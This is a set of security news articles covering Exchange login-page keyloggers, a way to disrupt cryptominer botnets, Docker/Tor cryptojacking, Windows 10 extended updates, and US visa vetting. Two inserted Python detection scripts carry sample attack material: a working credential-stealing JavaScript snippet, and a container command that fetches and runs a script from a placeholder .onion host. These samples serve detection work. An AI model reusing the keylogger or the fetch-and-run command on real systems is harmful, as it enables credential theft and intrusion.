    The Windows maker describes ESU as a “last resort option” for customers who need to run legacy Microsoft software that has reached end-of-life (EoL) status. This is meant to be a temporary solution while migrating to a newer supported platform.

    As part of the new enrollment options announced by Microsoft, individuals can opt in to the program from their personal Windows 10 PC through an “enrollment wizard” available in the Settings app. Users can choose one of three options –

    • Use Windows Backup to sync your settings to the cloud (at no additional cost)
    • Redeem 1,000 Microsoft Rewards points (at no additional cost)
    • Pay $30 (local pricing may change)

    Once the appropriate option is selected, users’ PCs will be automatically enrolled into the program. ESU coverage for Windows 10 devices runs from October 15, 2025, to October 13, 2026.

    The enrollment wizard is currently available in the Windows Insider Program, and is expected to be rolled out to Windows 10 customers in July, with expanded availability set for mid-August.

    It’s worth noting that ESUs do not cover new features, non-security updates, or design change requests. Another key aspect to factor in is that using Microsoft Rewards or Windows Backup requires users to sign in with a Microsoft account, creating one if they don’t have one already.

    “Individuals or organizations who elect to continue using Windows 10 after support ends on October 14, 2025, will have the option of enrolling their PCs into a paid ESU subscription,” Microsoft notes.

    “The ESU program enables PCs to continue to receive critical and important security updates through an annual subscription service after support ends.”


    Source: thehackernews.com…

  • New U.S. Visa Rule Requires Applicants to Set Social Media Account Privacy to Public

    Jun 24, 2025 · Ravie Lakshmanan · Social Media / Privacy

    The United States Embassy in India has announced that applicants for F, M, and J nonimmigrant visas should make their social media accounts public.

    The new guideline seeks to help officials verify the identity and eligibility of applicants under U.S. law. The U.S. Embassy said every visa application review is a “national security decision.”

    “Effective immediately, all individuals applying for an F, M, or J nonimmigrant visa are requested to adjust the privacy settings on all of their personal social media accounts to ‘public’ to facilitate vetting necessary to establish their identity and admissibility to the United States,” the embassy said in a post on X.

    Under the new rules, Indian students and others planning to pursue academia or enroll in vocational or exchange programs are mandated to ensure that their social media profiles are set to public before submitting their visa applications. A refusal to set the accounts to “public” could be grounds for rejection.

    The embassy noted that the United States has required visa applicants to provide social media identifiers on immigrant and nonimmigrant visa application forms since 2019.

    It also said every piece of “available” information is used as part of its visa screening and vetting to identify visa applicants who are deemed inadmissible to the country, including those who pose a threat to its national security. However, it did not spell out what these steps would look for.

    Similar directives have been issued by other U.S. embassies across the world, with the U.S. Embassy in Mexico stating that visa applicants must list all social media usernames or handles of every platform they have used from the last 5 years.

    The development comes weeks after U.S. President Donald Trump’s administration ordered embassies around the world to stop scheduling appointments for student visas to expand social media vetting of such applicants. Last week, the U.S. Department of State said it’s resuming the process, but with new measures that require applicants to unlock their social media accounts for government review.

    “The United States must be vigilant during the visa issuance process to ensure that those applying for admission into the United States do not intend to harm Americans and our national interests, and that all applicants credibly establish their eligibility for the visa sought, including that they intend to engage in activities consistent with the terms for their admission,” the department said.


    Source: thehackernews.com…

  • Hackers Target Over 70 Microsoft Exchange Servers to Steal Credentials via Keyloggers

    Jun 24, 2025 · Ravie Lakshmanan · Vulnerability / Malware

    Microsoft Exchange Servers

    Unidentified threat actors have been observed targeting publicly exposed Microsoft Exchange servers, injecting malicious code into the Outlook on the web login page to harvest users’ credentials.

    Positive Technologies, in a new analysis published last week, said it identified two different kinds of keylogger code written in JavaScript on the Outlook login page –

    • Those that save collected data to a local file accessible over the internet
    • Those that immediately send the collected data to an external server

    The Russian cybersecurity vendor said the attacks have targeted 65 victims in 26 countries worldwide, and marks a continuation of a campaign that was first documented in May 2024 as targeting entities in Africa and the Middle East.

    At that time, the company said it had detected no less than 30 victims spanning government agencies, banks, IT companies, and educational institutions, with evidence of the first compromise dating back to 2021.

    The attack chains involve exploiting known flaws in Microsoft Exchange Server (e.g., ProxyShell) to insert keylogger code into the login page. It’s presently not known who is behind these attacks.

    Some of the vulnerabilities weaponized are listed below –

    • CVE-2014-4078 – IIS Security Feature Bypass Vulnerability
    • CVE-2020-0796 – Windows SMBv3 Client/Server Remote Code Execution Vulnerability
    • CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065 – Microsoft Exchange Server Remote Code Execution Vulnerability (ProxyLogon)
    • CVE-2021-31206 – Microsoft Exchange Server Remote Code Execution Vulnerability
    • CVE-2021-31207, CVE-2021-34473, CVE-2021-34523 – Microsoft Exchange Server Security Feature Bypass Vulnerability (ProxyShell)

    “Malicious JavaScript code reads and processes the data from the authentication form, then sends it via an XHR request to a specific page on the compromised Exchange Server,” security researchers Klimentiy Galkin and Maxim Suslov said.

    “The target page’s source code contains a handler function that reads the incoming request and writes the data to a file on the server.”

    The file containing the stolen data is accessible from an external network. Select variants with the local keylogging capability have been found to also collect user cookies, User-Agent strings, and the timestamp.

    One advantage of this approach is that the chances of detection are next to nothing as there is no outbound traffic to transmit the information.

    The second variant detected by Positive Technologies, on the other hand, uses a Telegram bot as an exfiltration point via XHR GET requests with the encoded login and password stored in the APIKey and AuthToken headers, respectively.


    A second method involves using a Domain Name System (DNS) tunnel in conjunction with an HTTPS POST request to send the user credentials and sneak past an organization’s defenses.
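    A defender-side check for the pattern described above, as an added example that is not part of the original report or Positive Technologies' tooling: it pulls the inline scripts out of a logon page and flags any that both read the password field and send it with XHR or fetch. The sample page and the `/owa/auth/theme.aspx` handler path in it are constructed placeholders.

```python
"""Heuristic scan of an OWA logon page for injected credential-harvesting scripts.

Added example, not Positive Technologies' tooling. Hits still need review
against a known-good copy of the page; the sample below is constructed.
"""
import re

SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)
# reads of the login form's password field
FORM_READ_RE = re.compile(
    r"""(getElementById|querySelector|getElementsByName)\s*\(\s*['"][^'"]*(pass|pwd)[^'"]*['"]"""
    r"""|\.(password|passwd|pwd)\b""", re.I)
# ways a script can ship what it read somewhere else
SEND_RE = re.compile(r"(XMLHttpRequest|\.send\s*\(|fetch\s*\(|navigator\.sendBeacon)", re.I)
# markers of the Telegram-bot variant (credentials in APIKey/AuthToken headers)
TELEGRAM_RE = re.compile(r"api\.telegram\.org|APIKey|AuthToken", re.I)
OPEN_RE = re.compile(r"""open\s*\(\s*['"](GET|POST)['"]\s*,\s*['"]([^'"]+)['"]""")


def find_keylogger_scripts(html: str) -> list:
    """Return one dict per inline script that reads the password and exfiltrates it."""
    hits = []
    for idx, body in enumerate(SCRIPT_RE.findall(html)):
        if FORM_READ_RE.search(body) and SEND_RE.search(body):
            hits.append({
                "script_index": idx,
                "targets": [url for _, url in OPEN_RE.findall(body)],
                "telegram": bool(TELEGRAM_RE.search(body)),
            })
    return hits


# Constructed logon page: one benign handler, one stand-in for the injected keylogger.
SAMPLE_PAGE = """<html><body>
<form action="/owa/auth.owa" method="post">
<input id="username" name="username"><input id="password" name="password" type="password">
<input type="submit" value="sign in"></form>
<script>function clkLgn(){ /* benign stand-in for the legitimate handler */ return true; }</script>
<script>
/* constructed stand-in for the injected keylogger; the handler page is a placeholder */
document.forms[0].addEventListener("submit", function () {
  var u = document.getElementById("username").value;
  var p = document.getElementById("password").value;
  var x = new XMLHttpRequest();
  x.open("POST", "/owa/auth/theme.aspx", false);
  x.send(btoa(u + ":" + p));
});
</script></body></html>"""
```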

    Twenty-two of the compromised servers have been found in government organizations, followed by infections in the IT, industrial, and logistics companies. Vietnam, Russia, Taiwan, China, Pakistan, Lebanon, Australia, Zambia, the Netherlands, and Turkey are among the top 10 targets.

    “A large number of Microsoft Exchange servers accessible from the Internet remain vulnerable to older vulnerabilities,” the researchers said. “By embedding malicious code into legitimate authentication pages, attackers are able to stay undetected for long periods while capturing user credentials in plaintext.”



    Source: thehackernews.com…

  • Researchers Find Way to Shut Down Cryptominer Campaigns Using Bad Shares and XMRogue

    Researchers Find Way to Shut Down Cryptominer Campaigns Using Bad Shares and XMRogue

    Jun 24, 2025 | Ravie Lakshmanan | Malware / Cryptocurrency

    Cryptominer Campaigns

    Cybersecurity researchers have detailed two novel methods that can be used to disrupt cryptocurrency mining botnets.

    The methods take advantage of the design of various common mining topologies in order to shut down the mining process, Akamai said in a new report published today.

    “We developed two techniques by leveraging the mining topologies and pool policies that enable us to reduce a cryptominer botnet’s effectiveness to the point of completely shutting it down, which forces the attacker to make radical changes to their infrastructure or even abandon the entire campaign,” security researcher Maor Dahan said.


    The techniques, the web infrastructure company said, hinge on exploiting the Stratum mining protocol such that it causes an attacker’s mining proxy or wallet to be banned, effectively disrupting the operation.

    The first of the two approaches, dubbed bad shares, entails banning the mining proxy from the network, which, in turn, results in the shutdown of the entire operation and causes the victim’s CPU usage to plummet from 100% to 0%.

    While a mining proxy acts as an intermediary that shields an attacker’s mining pool and, by extension, their wallet addresses, it also becomes a single point of failure: interfering with its regular function brings the whole operation down.

    “The idea is simple: By connecting to a malicious proxy as a miner, we can submit invalid mining job results — bad shares — that will bypass the proxy validation and will be submitted to the pool,” Dahan explained. “Consecutive bad shares will eventually get the proxy banned, effectively halting mining operations for the entire cryptomining botnet.”

    In practice, this involves using an in-house developed tool called XMRogue to impersonate a miner, connect to the mining proxy, submit consecutive bad shares, and ultimately get the mining proxy banned from the pool.

    The second method devised by Akamai exploits scenarios where a victim miner is connected directly to a public pool sans a proxy, leveraging the fact that the pool can ban a wallet’s address for one hour if it has more than 1,000 workers.

    In other words, initiating more than 1,000 login requests using the attacker’s wallet concurrently will force the pool to ban the attacker’s wallet. However, it’s worth noting this isn’t a permanent solution as the account can stage a recovery as soon as the multiple login connections are stopped.


    Akamai noted that while the aforementioned methods have been used to target Monero cryptocurrency miners, they can be extended to other cryptocurrencies as well.

    “The techniques presented above show how defenders can effectively shut down malicious cryptominer campaigns without disrupting the legitimate pool operation by taking advantage of pool policies,” Dahan said.

    “A legitimate miner will be able to quickly recover from this type of attack, as they can easily modify their IP or wallet locally. This task would be much more difficult for a malicious cryptominer as it would require modifying the entire botnet. For less sophisticated miners, however, this defense could completely disable the botnet.”



    Source: thehackernews.com…

  • Between Buzz and Reality: The CTEM Conversation We All Need

    Between Buzz and Reality: The CTEM Conversation We All Need

    Jun 24, 2025 | Ravie Lakshmanan | Threat Exposure Management

    I had the honor of hosting the first episode of the Xposure Podcast live from Xposure Summit 2025. And I couldn’t have asked for a better kickoff panel: three cybersecurity leaders who don’t just talk security, they live it.

    Let me introduce them.

    Alex Delay, CISO at IDB Bank, knows what it means to defend a highly regulated environment. Ben Mead, Director of Cybersecurity at Avidity Biosciences, brings a forward-thinking security perspective that reflects the innovation behind Avidity’s targeted RNA therapeutics. Last but not least, Michael Francess, Director of Cybersecurity Advanced Threat at Wyndham Hotels and Resorts, leads the charge in protecting the franchise. Each brought a unique vantage point to a common challenge: applying Continuous Threat Exposure Management (CTEM) to complex production environments.

    Gartner made waves in 2023 with a bold prediction: organizations that prioritize CTEM will be three times less likely to be breached by 2026. But here’s the kicker – only if it’s operationalized.

    Speaking with these seasoned defenders, we unpacked the realities and challenges behind the hype of implementing and operationalizing an effective Exposure Management strategy, addressing the following tough questions:

    • What does a good CTEM program look like and what are the typical challenges that need to be overcome?
    • How do you optimize cyber and risk reporting to influence board-level decisions?
    • And ultimately, how do you measure the success of your CTEM program?

    Challenges, Priorities, and Best Practices

    CTEM isn’t plug-and-play. The panelists’ prescription was clear: start with asset inventory and identity management: weak service accounts, over-permissioned users, legacy logins. None of these are small gaps; they’re wide-open doors that need to be checked frequently. And for all of our panelists, frequency matters – a lot. Because guess what? Adversaries are constantly challenging defenses too. For internal assets, weekly validation is the rule of thumb. For external-facing assets? Daily. As they see it, it’s the only way to maintain a constant handle on their constantly changing environments.

    Surprisingly, Michael pointed to threat intelligence as the backbone of any security testing program. “You need to understand your adversaries, simulate their TTPs, and test your defenses against real-world scenarios, not just patching CVEs.” That’s the key difference between CTEM and vulnerability management. Vulnerability management is about patching. Exposure management is about figuring out whether your controls actually work to block threats.

    Reporting: Translating Cyber to Risk Terms

    In the banking industry, like many other highly regulated industries, Alex couldn’t emphasize enough the need to be prepared to answer hard questions asked by regulators. “You will get challenged on your exposure, your remediation timelines, and your risk treatment. And that’s a good thing. It forces clarity and accountability.”

    But even outside regulated industries, the conversation is changing. Boards do not want to hear about CVSS scores. They want to understand risk – and that’s a completely different discussion. Is the company’s risk profile going up or down? Where is it concentrated? And what are we doing about it?

    Measuring Progress

    Success in CTEM isn’t about counting vulnerabilities; Ben pinned it down when he said he measures the number of exploited attack paths his team has closed. He shared how validating attack paths revealed risky security gaps, like over-permissioned accounts and forgotten assets. Suddenly, risk becomes visible.

    Others took it in another direction with tabletop exercises that walk leadership through real attack scenarios. It’s not about metrics; it’s about explaining the risk and the consequences: a shift that moves the discussion from noise to signal, and gives the business clarity on what matters, where we’re exposed and what we’re doing about it.

    From Concept to Action

    Want to hear how these defenders are putting CTEM into action without drowning in noise?

    This episode dives deep into the real questions: where do you start, how do you stay focused on what’s exploitable, and how do you connect it all to business risk? You’ll hear first-hand how security leaders like Alex, Ben, and Michael are tackling these challenges head-on, with a few surprises along the way…

    🎧 Make sure to catch the full conversation on Apple Podcasts and Spotify.



    Source: thehackernews.com…

  • Hackers Exploit Misconfigured Docker APIs to Mine Cryptocurrency via Tor Network

    Hackers Exploit Misconfigured Docker APIs to Mine Cryptocurrency via Tor Network

    Jun 24, 2025 | Ravie Lakshmanan | Cloud Security / Cryptojacking

    Docker APIs to Mine Cryptocurrency

    Misconfigured Docker instances are the target of a campaign that employs the Tor anonymity network to stealthily mine cryptocurrency in susceptible environments.

    “Attackers are exploiting misconfigured Docker APIs to gain access to containerized environments, then using Tor to mask their activities while deploying crypto miners,” Trend Micro researchers Sunil Bharti and Shubham Singh said in an analysis published last week.

    The use of Tor is meant to anonymize the attackers’ origin while the miner is installed on compromised systems. The attacks, per the cybersecurity company, commence with a request from the IP address 198.199.72[.]27 to obtain a list of all containers on the machine.

    If no containers are present, the attacker proceeds to create a new one based on the “alpine” Docker image and mounts the “/hostroot” directory – i.e., the root directory (“/”) of the physical or virtual host machine – as a volume inside it. This behavior poses security risks as it allows the container to access and modify files and directories on the host system, resulting in a container escape.


    The threat actors then execute a carefully orchestrated sequence of actions that involves running a Base64-encoded shell script to set up Tor on the container as part of the creation request and ultimately fetch and execute a remote script from a .onion domain (“wtxqf54djhp5pskv2lfyduub5ievxbyvlzjgjopk6hxge5umombr63ad[.]onion”).

    “It reflects a common tactic used by attackers to hide command-and-control (C&C) infrastructure, avoid detection, and deliver malware or miners within compromised cloud or container environments,” the researchers said. “Additionally, the attacker uses ‘socks5h’ to route all traffic and DNS resolution through Tor for enhanced anonymity and evasion.”

    Once the container is created, the “docker-init.sh” shell script is deployed, which then checks for the “/hostroot” directory mounted earlier and modifies the system’s SSH configuration to set up remote access by enabling root login and adding an attacker-controlled SSH key into the ~/.ssh/authorized_keys file.

    The threat actor has also been found to install various tools like masscan, libpcap, zstd, and torsocks, beacon to the C&C server details about the infected system, and ultimately deliver a binary that acts as a dropper for the XMRig cryptocurrency miner, along with the necessary mining configuration, the wallet addresses, and mining pool URLs.
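    Defenders can look for this chain in the specs of running containers. The following is an added example, not Trend Micro’s or Docker’s code: it assumes records in the JSON shape returned by `docker inspect` and flags containers that bind-mount the host’s “/”, pipe a Base64 blob into a shell, or reference a .onion address; the container names and the .onion address in the sample records are constructed placeholders.

```python
"""Audit Docker container specs for the chain described above.

Added example, not Trend Micro's or Docker's own code; the records
built by build_samples() are constructed, including the .onion name.
"""
import base64
import re

ONION_RE = re.compile(r"\b[a-z2-7]{16,56}\.onion\b")
B64_SHELL_RE = re.compile(r"base64\s+(-d|--decode)\b")
B64_BLOB_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")


def audit_container(spec: dict) -> list:
    """Return finding strings for one inspect-style record (empty if clean)."""
    findings = []
    for bind in spec.get("HostConfig", {}).get("Binds") or []:
        src, _, dst = bind.partition(":")      # "host_path:container_path[:opts]"
        if src == "/":                          # the "/hostroot" trick: whole host mounted
            findings.append(f"host root bind-mounted at {dst.split(':')[0]}")
    cmd = " ".join(spec.get("Config", {}).get("Cmd") or [])
    if B64_SHELL_RE.search(cmd):
        findings.append("command pipes a Base64 blob into a shell")
        # decode embedded blobs so indicators hidden inside them are checked too
        for blob in B64_BLOB_RE.findall(cmd):
            try:
                cmd += " " + base64.b64decode(blob).decode("utf-8", "ignore")
            except ValueError:                  # binascii.Error is a ValueError
                pass
    if ONION_RE.search(cmd):
        findings.append("command references a .onion address")
    return findings


def build_samples() -> list:
    """Constructed records: one mirroring the reported chain, one benign."""
    payload = ("apk add --no-cache tor torsocks && torsocks wget -qO- "
               "http://constructedexampleonionaddress.onion/docker-init.sh | sh")
    blob = base64.b64encode(payload.encode()).decode()
    malicious = {
        "Name": "/suspicious",
        "Config": {"Image": "alpine", "Cmd": ["sh", "-c", f"echo {blob} | base64 -d | sh"]},
        "HostConfig": {"Binds": ["/:/hostroot"]},
    }
    benign = {
        "Name": "/web",
        "Config": {"Image": "nginx", "Cmd": ["nginx", "-g", "daemon off;"]},
        "HostConfig": {"Binds": ["/srv/www:/usr/share/nginx/html:ro"]},
    }
    return [malicious, benign]
```

    Run `audit_container` over the output of `docker inspect $(docker ps -q)` to apply the same checks to live containers.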

    “This approach helps attackers avoid detection and simplifies deployment in compromised environments,” Trend Micro said, adding it observed the activity targeting technology companies, financial services, and healthcare organizations.


    The findings point to an ongoing trend of cyber attacks that target misconfigured or poorly secured cloud environments for cryptojacking purposes.

    The development comes as Wiz revealed that a scan of public code repositories has uncovered hundreds of validated secrets in mcp.json, .env, and AI agent configuration files and Python notebooks (.ipynb), turning them into a treasure trove for attackers.

    The cloud security firm said it found valid secrets belonging to over 30 companies and startups, including those belonging to Fortune 100 companies.

    “Beyond just secrets, code execution results in Python notebooks should be generally treated as sensitive,” researchers Shay Berkovich and Rami McCarthy said. “Their content, if correlated to a developer’s organization, can provide reconnaissance details for malicious actors.”



    Source: thehackernews.com…